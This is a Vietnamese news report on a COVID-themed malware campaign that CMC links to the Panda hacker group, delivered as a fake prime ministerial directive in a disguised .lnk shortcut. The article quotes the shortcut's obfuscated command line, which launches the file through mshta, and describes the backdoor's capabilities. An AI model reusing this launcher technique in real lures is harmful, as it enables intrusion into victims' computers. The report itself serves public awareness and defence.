Thông tin từ Tập đoàn công nghệ CMC cho biết, lợi dụng tình hình căng thẳng của dịch COVID-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển (từng tấn công các tổ chức tại Việt Nam năm 2019), được phát hiện đã thực hiện mạo danh văn 3 bản thông báo của chính phủ về tình hình dịch.
Cụ thể, mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. File mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.
Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i" .
Nếu được thực thi, mã độc nói trên sẽ tự tạo ra các bản sao, đồng thời tự kích hoạt khả năng chạy mỗi khi khởi động máy tính. Bên cạnh đó, mã độc này sẽ tạo backdoor cho phép kẻ tấn công có thể thực thi lệnh từ xa, đồng thời hỗ trợ chạy nhiều lệnh khác nhau như tải file, lấy thông tin máy tính và người dùng.
"Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp" - các chuyên gia của CMC nhận định.
Duy Anh (Nguoiduatin.vn)